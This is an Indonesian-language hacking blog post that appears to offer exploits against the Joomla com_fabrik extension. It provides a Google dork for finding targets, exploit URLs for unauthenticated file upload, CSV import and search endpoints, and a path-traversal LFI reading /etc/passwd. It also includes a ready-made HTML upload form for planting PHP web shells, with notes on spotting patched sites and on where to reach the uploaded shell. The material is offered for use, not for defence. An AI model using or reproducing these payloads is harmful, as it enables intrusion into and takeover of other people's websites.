Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability.


[ Exploit Title ] => Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability.
[ Vendor Homepage ] => extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
[ Google Dorks ] => inurl:''/index.php?option=com_fabrik''
[ Admin Login ] => /administrator/

[ Exploit 1 ]

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

#Vulnerability / Error :

{"filepath":null,"uri":null}
or
{"error":"Error. Unable to upload file."}
===========================================

[ Exploit 2 ]

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

Directory File Path : /media/
===========================================

[ Exploit 3 ]

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=
12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]

Note : jika situs web mengatakan sambil mengeksploitasi kode seperti ini ''Sorry this form it not published''. Itu tidak rentan. Bug nya dah di perbaiki gan.
===========================================

[ Exploit 4 ]

/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg

#Vulnerability / Error :

{"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","
___anrede":["0"],"___name":"","___email":"",
"___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","
___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"",
"___anrede":"bitte wählen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"",
"___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":
{"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":
"getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}
===========================================

[ Exploit 5 => LFI ]

/index.php?option=com_fabrik&controller=[Local File Inclusion]

/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00

Note : Jika mengatakan saat mengeksploitasi kode. "0 Call to a member function getData() on null" berarti web nya dah di patch gan.
===========================================

# CSRF => Save dengan ektensi .html

<!DOCTYPE html>
<html>
<head>
<title>CSRF :: Com_Fabrik File Upload Shell Acces</title>
<style type="text/css">
body {
text-align: center;
display: flex;
justify-content: center;
align-items: center;
color: #fff;
font-family:Arial,sans-serif;
}

.razzer-form {
width: 400px;
position: relative;
background: #2a2a2a;
text-align: center;
box-shadow: -5px -5px 10px rgba(255,255,255, 0.2),
5px 5px 15px rgba(0,0,0,0.7);
padding: 40px 40px 60px;
border-radius: 10px;
margin-top: 50%;
}

form {
margin-top: 20px;
}

h1 {
font-size: 23px;
}

label {
text-align: left;
}

</style>
</head>
<body>
<div class="razzer-form">
<h1> CSRF => Com_Fabrik File Upload Shell Acces</h1>
<label> Author Code : M.Ridwan // Tupai_Kun </label>
<form method="POST" action="pastekan dsini target serta exploit nya"
enctype="multipart/form-data">
<input type="file" name="file" onclick="alert('Upload File : .html .htm .php .jpg .txt .gif .shell.php.jpg .shell.PhP.jpeg .shell.php.png')">
<input type="submit" value="Gas">
</form>
</div>
<body>
</html>


===========================================

# Exploit 1 => Kalo sudah di upload maka hasil nya seperti ini.

{"filepath":"\/.htaccess","uri":"http:\/\/contohweb.com\/.htaccess"}

#Untuk memanggil shell nya : razzerhacker.blogspot.com/media/shell.php

Belum ada Komentar untuk "Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability."

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel